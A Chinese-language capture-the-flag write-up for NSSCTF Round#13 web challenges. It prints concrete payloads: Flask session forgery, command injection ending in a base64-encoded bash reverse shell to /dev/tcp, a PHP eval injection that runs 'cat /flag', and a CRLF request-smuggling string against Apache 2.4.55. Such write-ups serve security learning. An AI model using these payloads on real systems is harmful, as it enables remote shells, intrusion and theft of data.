NSSCTF Round#13 web专项
rank:3
flask?jwt?
简单的注册个账号,在/changePassword
下查看页面源代码发现密钥<!-- secretkey: th3f1askisfunny -->
,很好,老套路了,flask-session-cookie-manager伪造,把_user_id
改成1,访问/getFlag
,拿到flag
ez_factors
查看页面源代码,发现路由/factors/114514
,访问发现114514被分解,猜测后台逻辑是利用linux命令factor对/factors/
后接的字符执行,这样直接用;
来个多命令执行,访问/factors/114514;cd ..;cd ..;cd ..;cd ..;cat flag
,有东西不过是一串数字,嗯,看样子应该是读不出来了,直接反弹shell,echo YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=|base64 -d|bash
,利用base64防止有/导致破坏路由,成功反弹shell
MyWeb
代码如下:
<?php
error_reporting(E_ALL);
// 写了个网页存储JSON数据,但是还不会处理json格式,这样处理应该没有什么问题吧
if ($_GET['mode'] == 'save') {
$data = file_get_contents('/tmp/data.json');
$value = addslashes($_GET['value']);
$data = str_replace(']', ", '$value']", $data);
file_put_contents('/tmp/data.json', $data);
} else if ($_GET['mode'] == 'read') {
$data = file_get_contents('/tmp/data.json');
eval('$data = ' . $data . ';');
print_r($data);
} else {
highlight_file(__FILE__);
}
很明显能命令执行,写个1进去,read之后是这样的
看代码把]
替换成, $value]
,猜测它的json文件是这样写的:[1,2,3········]
这样我们构造把它闭合不就能执行命令了,直接构造个
];%0aecho
cat /flag
;%0a[
]闭合前面的[,[则闭合后面的],%0a换行确保我们的命令能执行
read一下,拿到flag
flask?jwt?(hard)
第一道题的复仇版,其实也没多啥内容,就开了个Debug,让我们找密钥,还是先注册个账号登录,页面源代码给了个/wor
路由,访问之后,没什么有用的信息,我们直接给seesion改了,删减几个字符,成功进入Debug页面,这里直接抓包,搜secret,成功拿到密钥
接下来跟第一道一样的步骤,这里不在赘述
信息收集
Apache HTTP Server2.4.55,百度一下这个版本,有个请求走私漏洞,但我们啥也不知道,不知道走私哪
参考这篇文章http://www.hackdig.com/03/hack-949961.htm
访问index.php,这里有个任意文件读取,读/usr/local/apache2/conf/httpd.conf
发现这个
嗯,做了个proxy转发,猜测flag直接就在转发后当前目录flag.txt里(瞎猜就是了,大不了多试试),利用CRLF注入,payload:
/nssctf/0%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/flag.txt
TimeTrcer
做大牢,前端做不了一点